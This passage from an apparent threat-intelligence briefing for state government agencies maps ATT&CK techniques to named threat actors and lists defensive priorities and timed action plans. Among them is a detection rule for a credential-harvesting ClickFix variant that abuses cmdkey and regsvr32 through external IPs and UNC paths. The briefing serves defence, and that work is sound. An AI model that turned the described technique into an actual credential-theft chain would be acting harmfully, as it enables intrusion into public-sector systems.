<p>T1219</p> </td> <td> <p>Remote Access Software</p> </td> <td> <p>UNC6692 SNOW</p> </td> </tr> <tr> <td> <p>T1486</p> </td> <td> <p>Data Encrypted for Impact</p> </td> <td> <p>WARLOCK SPIDER / Qilin</p> </td> </tr> <tr> <td> <p>T1490</p> </td> <td> <p>Inhibit System Recovery</p> </td> <td> <p>WARLOCK SPIDER / Qilin</p> </td> </tr> <tr> <td> <p>T1048.003</p> </td> <td> <p>Exfiltration Over Unencrypted Protocol (FTP)</p> </td> <td> <p>Qilin ransomware</p> </td> </tr> </tbody>
</table>
<h2><strong>Sector-Specific Defensive Priorities </strong></h2>
<h3><strong>Financial Services (State Treasury, Revenue, Benefits Systems)</strong></h3>
<p>State financial systems process tax payments, benefits disbursements, and procurement transactions — making them high-value targets for both ransomware operators and credential-theft campaigns.</p>
<ul> <li><strong>Priority 1:</strong> UNC6692 SNOW framework poses direct risk to M365-integrated financial workflows. Restrict external Teams access for finance-facing accounts and enforce phishing-resistant MFA (FIDO2) on all accounts with access to financial systems.</li> <li><strong>Priority 2:</strong> ClickFix cmdkey/regsvr32 variant can harvest stored credentials for financial applications. Audit cmdkey credential stores on finance workstations — no external IPs should be present.</li> <li><strong>Priority 3:</strong> WARLOCK SPIDER/Qilin explicitly targets financial services. Ensure offline backups of financial databases are current and tested. Monitor for outbound FTP from financial system servers.</li>
</ul>
<h3><strong>Energy (State Energy Offices, Utility Oversight, Grid Interdependencies)</strong></h3>
<ul> <li><strong>Priority 1:</strong> The <strong>Itron breach</strong> is the most immediate concern. If your state’s regulated utilities or municipal power/water systems use Itron smart meters or grid management platforms, initiate vendor engagement immediately. Request Itron’s breach notification letter and assess whether any state-managed or state-overseen systems share network connectivity with Itron infrastructure.</li> <li><strong>Priority 2:</strong> <strong>Volt Typhoon</strong> prepositioning in critical infrastructure remains the strategic threat. Behavioral detection of lateral movement (not IOC-based blocking) is the only effective countermeasure. Focus on anomalous authentication patterns in OT-adjacent networks.</li> <li><strong>Priority 3:</strong> Ensure SCADA/ICS networks are segmented from enterprise IT. The convergence of IT breaches (Itron) and OT prepositioning (Volt Typhoon) means a single compromise could bridge both domains.</li>
</ul>
<h3><strong>Healthcare (State Health Agencies, Medicaid Systems, Public Health)</strong></h3>
<ul> <li><strong>Priority 1:</strong> WARLOCK SPIDER/Qilin, DragonForce, and Akira all explicitly target healthcare. State Medicaid systems, public health databases, and hospital oversight systems are in scope. Block Qilin exfiltration IPs and monitor for outbound FTP from healthcare data repositories.</li> <li><strong>Priority 2:</strong> UNC6692 Teams impersonation is particularly dangerous in healthcare environments where IT support interactions are frequent and trust is high. Establish a clear policy: IT will never initiate unsolicited Teams calls requesting remote access.</li> <li><strong>Priority 3:</strong> Ensure HIPAA-regulated data stores have immutable backups. Ransomware actors increasingly target healthcare knowing that patient safety concerns accelerate ransom payment decisions.</li>
</ul>
<h3><strong>Government (Executive Branch Agencies, Legislature, Courts)</strong></h3>
<ul> <li><strong>Priority 1:</strong> ClickFix remains the most likely initial access vector for state government compromise. The cmdkey/regsvr32 variant specifically targets government. Update detection rules immediately — PowerShell-only monitoring is no longer sufficient.</li> <li><strong>Priority 2:</strong> <strong>APT28/Fancy Bear</strong> fresh indicators suggest active Russian intelligence collection against government targets. Pull the current APT28 indicator set from Anomali ThreatStream Next-Gen and deploy to EDR and email security gateways. Brief agency security officers on spearphishing awareness.</li> <li><strong>Priority 3:</strong> <strong>APT41</strong> continues targeting state government .NET web applications. Audit all internet-facing .NET applications for current patching status, particularly SharePoint instances (CVE-2025-53770 is under active exploitation by China-origin actors).</li> <li><strong>Priority 4:</strong> Review Microsoft Store application policies. The Vibing.exe incident demonstrates that even “trusted” app stores can distribute surveillance-capable software. Consider WDAC/AppLocker policies restricting Store installations to an approved whitelist.</li>
</ul>
<h3><strong>Aviation / Logistics (State DOT, Airport Authorities, Port Systems)</strong></h3>
<ul> <li><strong>Priority 1:</strong> WARLOCK SPIDER’s target list includes transportation and logistics. State DOT systems managing traffic infrastructure, airport IT networks, and port logistics platforms should be assessed for ransomware readiness — particularly backup integrity and network segmentation.</li> <li><strong>Priority 2:</strong> Volt Typhoon’s prepositioning in critical infrastructure includes transportation systems. Audit SOHO routers and edge devices in DOT field offices and remote transportation management centers for signs of compromise. Replace end-of-life networking equipment that cannot receive firmware updates.</li> <li><strong>Priority 3:</strong> The <strong>FIRESTARTER</strong> Cisco ASA/FTD backdoor is relevant to any agency using Cisco firewalls at transportation facilities. Verify compliance with CISA Emergency Directive 25-03 — standard patching is insufficient; forensic verification of firmware integrity is required.</li>
</ul>
<h2><strong>Prioritized Defense Recommendations</strong></h2>
<h3><strong>IMMEDIATE (Within 24 Hours)</strong></h3>
<table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>1</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Create detection rules for ClickFix LOLBin variant:</strong> Alert on cmdkey.exe with external IP arguments and regsvr32.exe loading DLLs via UNC paths. Existing PowerShell-based ClickFix rules do not detect this variant.</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Deploy APT28/Fancy Bear IOCs to detection stack:</strong> Pull the current APT28 malware indicator set (confidence 90) directly from Anomali ThreatStream Next-Gen and CrowdStrike Falcon Intelligence feeds and deploy to EDR and email security gateways.</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p>Security Awareness</p> </td> <td> <p><strong>Issue advisory to all agency staff:</strong> IT support will never initiate unsolicited Microsoft Teams calls requesting remote access. Any such call should be reported to the SOC immediately.</p> </td> </tr> </tbody>
</table>
<h3><strong>7-DAY Actions</strong></h3>
<table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>1</p> </td> <td> <p>IT Ops / M365 Admin</p> </td> <td> <p><strong>Restrict Microsoft Teams external access:</strong> Configure external access policies to block or limit inbound Teams calls and messages from unverified external domains. This is the primary mitigation for UNC6692 SNOW.</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p>IT Ops</p> </td> <td> <p><strong>Inventory Itron product usage</strong> across all state agencies and utility oversight bodies. If Itron systems are in use, contact the vendor for breach impact assessment and monitor for follow-on advisories.</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p>IT Ops / IAM</p> </td> <td> <p><strong>Audit Microsoft Entra ID Service Principal permissions.</strong> A recently patched vulnerability allowed privilege escalation to tenant admin via Service Principal abuse. Verify Entra ID agent configurations are current and remove excessive Service Principal privileges. Confirm April 2026 Patch Tuesday updates are deployed.</p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p>IT Ops / M365 Admin</p> </td> <td> <p><strong>Evaluate RemoveMicrosoftCopilotApp Group Policy</strong> for enterprise deployment to reduce attack surface from bundled AI features on managed endpoints.</p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Tune Teams telemetry:</strong> Enable and review audit logging for external Teams interactions, particularly inbound calls from external tenants and screen-sharing sessions initiated by external users.</p> </td> </tr> </tbody>
</table>
<h3><strong>30-DAY Actions</strong></h3>
<table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>1</p> </td> <td> <p>CISO / Enterprise Architecture</p> </td> <td> <p><strong>Implement Microsoft Store application whitelisting.</strong> Deploy AppLocker or Windows Defender Application Control (WDAC) policies restricting Microsoft Store app installation to an approved list. The Vibing.exe incident proves the Store is not a trusted boundary.</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p>CISO / Procurement</p> </td> <td> <p><strong>Request security posture assessments from all contracted MSPs.</strong> Require SOC 2 Type II attestation or equivalent. MSP supply chain compromise remains a structurally high risk for state government — the absence of recent incidents is not evidence of safety.</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p>CISO / Network Engineering</p> </td> <td> <p><strong>Verify Cisco ASA/FTD firmware integrity</strong> per CISA Emergency Directive 25-03. The FIRESTARTER backdoor persists at the pre-OS boot level and survives standard patching. Forensic verification — not just patching — is required.</p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p>CISO / Application Security</p> </td> <td> <p><strong>Audit all internet-facing .NET web applications</strong> for current patching, with specific attention to SharePoint instances. APT41 continues targeting state government .NET applications, and CVE-2025-53770 is under active exploitation.</p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p>CISO / IR Planning</p> </td> <td> <p><strong>Update incident response playbooks</strong> to include Teams-based social engineering scenarios (UNC6692), LOLBin-based ClickFix variants (cmdkey/regsvr32), and supply chain breach response procedures (Itron model). Tabletop these scenarios within 30 days.</p> </td> </tr> </tbody>
</table>
<h2><strong>The Bottom Line </strong></h2>
<p>The threat actors targeting state government are not standing still. This week alone, we saw a social engineering campaign weaponize Microsoft Teams as an attack platform, a proven phishing technique evolve to evade the detection rules most SOCs have in place, a critical infrastructure vendor disclose a breach with unknown scope, and Russia’s most capable cyber-espionage group refresh its malware arsenal.</p>
<p>What makes this moment particularly challenging is the convergence. UNC6692 exploits your collaboration platform. ClickFix exploits your users and now evades your detections. Itron’s breach threatens your supply chain. Volt Typhoon sits quietly in your infrastructure waiting. These are not separate problems — they are different facets of the same reality: adversaries are targeting the trust relationships and technology dependencies that make state government function.</p>
<p>The good news is that the defensive actions are concrete and achievable. Restricting Teams external access, updating detection rules for LOLBin-based social engineering, blocking known ransomware infrastructure, and inventorying vendor exposure are all actions that can be taken this week with existing resources.</p>
<p>The question is not whether these threats will reach your environment. Several of them already have the capability. The question is whether your defenses have kept pace with the adversary’s evolution. Based on this week’s intelligence, the answer for most state agencies is: not yet — but the gap is closable if you act now.</p>